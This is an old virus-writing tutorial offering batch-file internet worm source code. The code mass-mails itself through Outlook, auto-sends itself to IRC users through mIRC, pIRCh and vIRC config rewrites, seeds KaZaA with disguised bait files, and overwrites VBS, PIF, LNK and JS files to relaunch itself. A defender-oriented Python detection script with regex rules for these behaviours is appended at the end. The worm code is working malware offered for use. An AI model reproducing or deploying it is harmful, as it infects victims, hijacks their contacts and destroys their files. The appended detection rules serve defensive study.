Perfect Internet-Worm via Batch 2.0 by Second Part To Hell
In this article I'll show you some very successfull techniques for a batch internet worm. If you have any questions, contact me! 1.) eMail spreading 2.) mIRC spreading 3.) pIRCh spreading 4.) vIRC spreading 5.) KaZaA spreading 6.) VBS dropping 7.) PIF dropping 8.) LNK dropping 9.) JS dropping + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1.) eMail spreading First the source: * * * * * * * * * * * * * * * * * * * copy %0 C:\ATTACHMENT.bat copy %0 C:\kvqim.vbs echo Dim x > C:\kvqim.vbs echo.on error resume next >> C:\kvqim.vbs echo Set fso =" Scripting.FileSystem.Object" >> C:\kvqim.vbs echo Set so=CreateObject(fso) >> C:\kvqim.vbs echo Set ol=CreateObject("Outlook.Application") >> C:\kvqim.vbs echo Set out=WScript.CreateObject("Outlook.Application") >> C:\kvqim.vbs echo Set mapi = out.GetNameSpace("MAPI") >> C:\kvqim.vbs echo Set a = mapi.AddressLists(1) >> C:\kvqim.vbs echo Set ae=a.AddressEntries >> C:\kvqim.vbs echo For x=1 To ae.Count >> C:\kvqim.vbs echo Set ci=ol.CreateItem(0) >> C:\kvqim.vbs echo Set Mail=ci >> C:\kvqim.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) >> C:\kvqim.vbs echo Mail.Subject="SUBJECT" >> C:\kvqim.vbs echo Mail.Body="BODY" >> C:\kvqim.vbs echo Mail.Attachments.Add("C:\ATTACHMENT.bat") >> C:\kvqim.vbs echo Mail.Send >> C:\kvqim.vbs echo Next >> C:\kvqim.vbs echo ol.Quit >> C:\kvqim.vbs cscript C:\kvqim.vbs del C:\kvqim.vbs del C:\ATTACHMENT.bat * * * * * * * * * * * * * * * * * * * This File makes a VBS-file to send itself to all contacts in the MS-Outlook addressbook I think, it's not hard to understand... + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 2.) mIRC spreading This virus infects the mIRC folder, if it exists. So the infected user sends viruses to every user in the chatroom! 
* * * * * * * * * * * * * * * * * * * copy %0 C:\pro\ATTACHMENT.bat if exist C:\mirc\script.ini set mIRC=C:\mirc if exist C:\mirc32\script.ini set mIRC=C:\mirc32 if exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc if exist C:\progra~1\mirc32\script.ini set mIRC=C:\progra~1\mirc32 copy file.bat %mIRC%\ATTACHMENT.bat echo [script] > %mIRC%\script.ini echo n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick %mIRC%\ATTACHMENT.bat } >>%mIRC%\script.ini * * * * * * * * * * * * * * * * * * * The virus searches for a script.ini file in 4 standart-mIRC-paths. If it finds the file, the variable "mIRC" will be the path. Then the virus overwrites the file with this file. If any mIRC user joins to the infected users chatroom, this file will send an infect file to that user. You can use "filesend" instead of "join" in the last line, but I think, "join" is much better. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 3.) pIRCh spreading The source first: * * * * * * * * * * * * * * * * * * * copy %0 C:\Pirch98\ATTACHMENT.bat echo [Levels] > C:\Pirch98\events.ini echo Enabled=1 >> C:\Pirch98\events.ini echo Count=6 >> C:\Pirch98\events.ini echo Level1=000-Unknows >> C:\Pirch98\events.ini echo 000-UnknowsEnabled=1 >> C:\Pirch98\events.ini echo Level2=100-Level 100 >> C:\Pirch98\events.ini echo 100-Level 100Enabled=1 >> C:\Pirch98\events.ini echo Level3=200-Level 200 >> C:\Pirch98\events.ini echo 200-Level 200Enabled=1 >> C:\Pirch98\events.ini echo Level4=300-Level 300 >> C:\Pirch98\events.ini echo 300-Level 300Enabled=1 >> C:\Pirch98\events.ini echo Level5=400-Level 400 >> C:\Pirch98\events.ini echo 400-Level 400Enabled=1 >> C:\Pirch98\events.ini echo Level6=500-Level 500 >> C:\Pirch98\events.ini echo 500-Level 500Enabled=1 >> C:\Pirch98\events.ini echo [000-Unknowns] >> C:\Pirch98\events.ini echo User1=*!*@* >> C:\Pirch98\events.ini echo UserCount=1 >> C:\Pirch98\events.ini echo Events1= ON JOIN:#: /dcc 
send $nick C:\Pirch98\ATTACHMENT.bat >> C:\Pirch98\events.ini echo EventCount=1 >> C:\Pirch98\events.ini echo [100-Level 100] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [200-Level 200] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [300-Level 300] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [400-Level 400] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini echo [500-Level 500] >> C:\Pirch98\events.ini echo UserCount=0 >> C:\Pirch98\events.ini echo EventCount=0 >> C:\Pirch98\events.ini * * * * * * * * * * * * * * * * * * * It's the same as mIRC. The virus overwrites the event.ini file, and if any user joins the infected user's chatroom, he will get an infected file. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 4.) vIRC spreading Source: * * * * * * * * * * * * * * * * * * * The source: copy %0 C:\Virc\ATTACHMENT.bat copy %0 xrwek.vbs echo.on error resume next >xrwek.vbs echo set ws = CreateObject("wscript.shell") >> xrwek.vbs set vircA=MeGaLiTh echo ws.regwrite "HKEY_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick C:\Virc\ATTACHMENT.bat " >>xrwek.vbs cscript xrwek.vbs del xrwek.vbs * * * * * * * * * * * * * * * * * * * The virus makes a vbs file, to write a new registy key! Then it sends an infected file to all users in the room, not only the users, who is joining the room. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 5.) 
KaZaA spreading Source: * * * * * * * * * * * * * * * * * * * copy %0 C:\regkey.vbs echo.on error resume next > C:\regkey.vbs echo set ws = CreateObject("wscript.shell") >> C:\regkey.vbs echo ws.regwrite "HKLM\Software\KaZaA\Transfer\DlDir0","%windir%\KaZaA\" >> C:\regkey.vbs cscript C:\regkey.vbs del C:\regkey.vbs md %windir%\KaZaA copy %MyS% %windir%\KaZaA\Nirvana - Lithium.mp3.bat * * * * * * * * * * * * * * * * * * * The virus makes a new directory, then copies itself to this dir. Then makes a Registry-Key. I think, it's also really easy. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 6.) VBS dropping VBS dropping means, that every .VBS file the virus can find, will be changed. If you open such a file, the file will open the virus. * * * * * * * * * * * * * * * * * * * copy %0 %windir%\yjdkt.bat copy %0 %windir%\upoby.vbs echo.on error resume next > %windir%\upoby.vbs echo dim wshs >> %windir%\upoby.vbs echo set wshs= wscript.createobject("wscript.shell") >> %windir%\upoby.vbs echo wshs.run "%windir%\yjdkt.bat" >> %windir%\upoby.vbs for %%q in (*.vbs \*.vbs ..\*.vbs %path%\*.vbs %windir%\*.vbs) do copy upoby.vbs %%q del %windir%\upoby.vbs * * * * * * * * * * * * * * * * * * * The virus makes a vbs file. If anybody opens this file, it will open the virus. Then the virus searches in the current, parent, root, path and windir directory for vbs files and copies the infected one to them. I think, it's easy but good! + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 7.) 
PIF dropping The same as VBS dropping, but now the virus will infect all .PIF files * * * * * * * * * * * * * * * * * * * copy %0 %windir%\drop.vbs copy %0 %windir%\xxseu.bat echo dim wshs, msc > %windir%\drop.vbs echo set wshs=Wscript.CreateObject("WScript.Shell") >> %windir%\drop.vbs echo set msc=wshs.CreateShortcut("C:\pif.lnk") >> %windir%\drop.vbs echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\xxseu.bat") >> %windir%\drop.vbs echo msc.WindowStyle = 4 >> %windir%\drop.vbs echo msc.Save >> %windir%\drop.vbs cscript %windir%\drop.vbs del %windir%\drop.vbs for %%k in (*.pif \*.pif ..\*.pif %path%\*.pif %windir%\*.pif) do copy C:\pif.pif %%k del C:\pif.pif * * * * * * * * * * * * * * * * * * * The virus makes a vbs file. This file generates a C:\pif.pif file. But why pif.pif, and not pif.lnk? The generated file opens the virus. This is a "dos"-virus, because of that it must be a .PIF file. Is it understandable??? Than the same as .VBS dropping. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 8.) LNK dropping What do you need for LNK droping? a windows file? But the virus is no windows file! Is it a problem? The answer is NO! What to do? You use a VBS (windows-file) file, which opens the virus. Than the same as .PIF dropping. 
* * * * * * * * * * * * * * * * * * * copy y.bat %windir%\dropa.vbs copy y.bat %windir%\mzxfv.bat copy y.bat %windir%\dropb.vbs echo.on error resume next >%windir%\dropb.vbs echo dim wshs >>%windir%\dropb.vbs echo set wshs=wscript.createobject("wscript.shell") >>%windir%\dropb.vbs echo wshs.run "%windir%\mzxfv.bat" >>%windir%\dropb.vbs echo dim wshs, msc > %windir%\dropa.vbs echo set wshs=Wscript.CreateObject("WScript.Shell") >> %windir%\dropa.vbs echo set msc=wshs.CreateShortcut("C:\vbs.lnk") >> %windir%\dropa.vbs echo msc.TargetPath = wshs.ExpandEnvironmentStrings("%windir%\dropb.vbs ") >> %windir%\dropa.vbs echo msc.WindowStyle = 4 >> %windir%\dropa.vbs echo msc.Save >> %windir%\dropa.vbs cscript %windir%\dropa.vbs del %windir%\dropa.vbs for %%k in (*.lnk \*.lnk ..\*.lnk %path%\*.lnk %windir%\*.lnk) do copy C:\vbs.lnk %%k * * * * * * * * * * * * * * * * * * * I think, you will understand it!!! + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 9.) JS dropping It's the same as VBS-dropping: * * * * * * * * * * * * * * * * * * * copy %0 %windir%\uatvs.bat echo { >> %windir%\snphh.js echo shell=WScript.CreateObject("WScript.Shell"; >> %windir%\snphh.js echo shell.Run("%windir%\uatvs.bat"); >> %windir%\snphh.js echo } >> %windir%\snphh.js for %%j in (*.js \*.js ..\*.js %path%\*.js %windir%\*.js) do copy snphh.js %%j del %windir%\snphh.js * * * * * * * * * * * * * * * * * * * First copy the file to the windows-dir. Then make a JS-file, that opens the virus in the windows-directory. Then copy the JS-file to every existing JS-file OK, it's easy... + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + I hope, you understood all the source and i could help you! greets, SeCoNd PaRt To HeLl www.spth.de.vu
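For defenders, the behaviours described in the sections above (a script copying itself, building a VBS/JS file with `echo` redirects and running it with `cscript`, rewriting IRC client configuration to send files on join, double-extension bait names, and overwrite loops over script or shortcut files) can be triaged statically. The following is an added example and not part of the original article; the rule names, the `triage` function and the sample scripts are constructed for illustration.

```python
import re

# Each rule: name -> regexes that must ALL match somewhere in the script text.
# The patterns mirror behaviours described in the article; names are hypothetical.
RULES = {
    "self_copy": [r"\bcopy\s+%0\b"],
    "echo_built_script_run": [r"\becho\b.*>>?\s*\S+\.(vbs|js)\b", r"\bcscript\b"],
    "outlook_address_book_mailer": [r"Outlook\.Application", r"AddressEntries",
                                    r"Attachments\.Add"],
    "irc_auto_dcc_send": [r"dcc\s+send\s+\$nick"],
    "irc_config_overwrite": [r">>?\s*\S*\\(script|events)\.ini\b"],
    "registry_write_via_wsh": [r"\.regwrite\b"],
    "double_extension_bait": [r"\.(mp3|jpg|avi|txt|doc)\.(bat|cmd|vbs|js|pif)\b"],
    "mass_overwrite_loop": [
        r"\bfor\s+%%\w\s+in\s*\([^)]*\*\.(vbs|js|pif|lnk)[^)]*\)\s*do\s+copy\b"],
}

def triage(script_text):
    """Return the sorted names of every rule whose patterns all match."""
    hits = []
    for name, patterns in RULES.items():
        if all(re.search(p, script_text, re.IGNORECASE) for p in patterns):
            hits.append(name)
    return sorted(hits)

# Constructed sample inputs (short fragments, not complete scripts).
SAMPLE_IRC = r"""
copy %0 C:\mirc\sample.bat
echo n0=on 1:join:#: /dcc send $nick C:\mirc\sample.bat >> C:\mirc\script.ini
"""

SAMPLE_DROPPER = r"""
copy %0 %windir%\sample.bat
echo set wshs=wscript.createobject("wscript.shell") >> %windir%\drop.vbs
cscript %windir%\drop.vbs
for %%q in (*.vbs ..\*.vbs) do copy %windir%\drop.vbs %%q
copy %0 "%windir%\share\song.mp3.bat"
"""

SAMPLE_BENIGN = r"""
@echo off
copy C:\reports\daily.txt D:\backup\daily.txt
echo backup finished >> C:\logs\backup.log
for %%f in (*.log) do copy %%f D:\backup\%%f
"""

if __name__ == "__main__":
    for label, text in [("irc", SAMPLE_IRC), ("dropper", SAMPLE_DROPPER),
                        ("benign", SAMPLE_BENIGN)]:
        print(label, triage(text))
```

A single hit such as `self_copy` is weak on its own; combinations are what make a batch file worth quarantining for review.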